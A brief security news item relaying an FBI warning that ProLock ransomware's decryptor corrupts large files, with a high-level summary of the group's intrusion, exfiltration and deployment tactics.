According to information received by Bleeping Computer, the FBI is warning victims of the ProLock ransomware that the decryptor may not be working correctly. Files over 64MB could become corrupted while decrypting and files over 100 MB can lose one byte per 1KB decrypted. This means that even victims who choose to pay the ransom may still lose access to critical files due to bugs in the decryption software provided by the ransomware operators.
Recently renamed, ProLock got its start as PwnedLocker in 2019. ProLock is currently known to spread via Qakbot infection or through exposed Remote Desktop Protocol (RDP) with weak credentials. Using previously stolen credentials or ones obtained through Qakbot, the ProLock operators use PsExec to execute scripts on remote hosts. Before installing the ransomware, open-source application Rclone is used to exfiltrate stolen data after it has been compressed using 7zip. Finally, the group attempts to deploy the ransomware across the entire organization by using PowerShell to inject a binary into memory after it is extracted from either a JPG or a PNG file.
